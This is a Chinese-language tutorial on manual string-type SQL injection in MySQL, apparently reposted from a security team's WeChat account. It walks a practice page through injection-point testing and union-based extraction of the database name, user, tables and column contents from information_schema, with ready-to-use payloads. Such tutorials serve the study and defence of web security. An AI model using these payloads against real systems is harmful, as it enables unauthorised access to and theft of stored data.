Mysql字符型手工注入

01

字符型注入_肯定注入點

正常搜索框搜索數據，輸入名字就能夠查詢對應數據

查看PHP核心代碼

解釋：

    1.紅色箭頭表示服務器經過GET請求把用戶的kobe參數傳到$name

    2.黃色方框表示傳入數據庫的查詢語句

加入惡意字符後，傳入數據庫的查詢語句以下：

select id,email from member where username='kobe''

很明顯kobe'傳入查詢的時候，後面的的分號與前面查詢語句的分號閉合，查詢語句多出一個分號，查詢語句不成立，致使報錯。

注入點測試，將payload1代入查詢

kobe' and 1=1 #

payload解釋：

利用分號閉合查詢語句中的分號，再經過#註釋掉查詢語句中後面的分號，則傳入數據庫查詢語句以下：

select id,email from member where username='kobe' and 1=1 #'

成功查詢到指定數據

kobe' and 1=2 #

02

字符型注入_獲取基本信息

在這裏基本肯定注入點，查看當前數據庫和用戶

kobe' union select database(),user()#

成功查詢到數據庫信息

傳入數據庫的查詢命令以下

select id,email from member where username='kobe' union select database(),user()#'

因而可知payload只要在黃色區間內，在足夠權限和符合語句邏輯狀態下能夠任意執行sql語句

👇經常使用查詢語句👇

肯定當前字段

kobe' order by 3#

查詢指定庫全部數據表

kobe' union select table_name,2,3 from information_schema.tables where (table_schema='數據庫名')#

查詢指定表的全部表頭

kebo' union select column_name,2,3 from information_schema.columns where (table_name="表名")#

查看指定表頭內容

kebo' union select 表頭1,2,表頭2 from 表名#

註釋：注入方法與數字型注入基本相同，只要在閉合與註釋符二者區間內執行mysql命令便可利用該漏洞，從這部分開始，後續不作詳細介紹與演示。

本文分享自微信公衆號 - Khan安全團隊（KhanCJSH）。
若有侵權，請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」，歡迎正在閱讀的你也加入，一塊兒分享。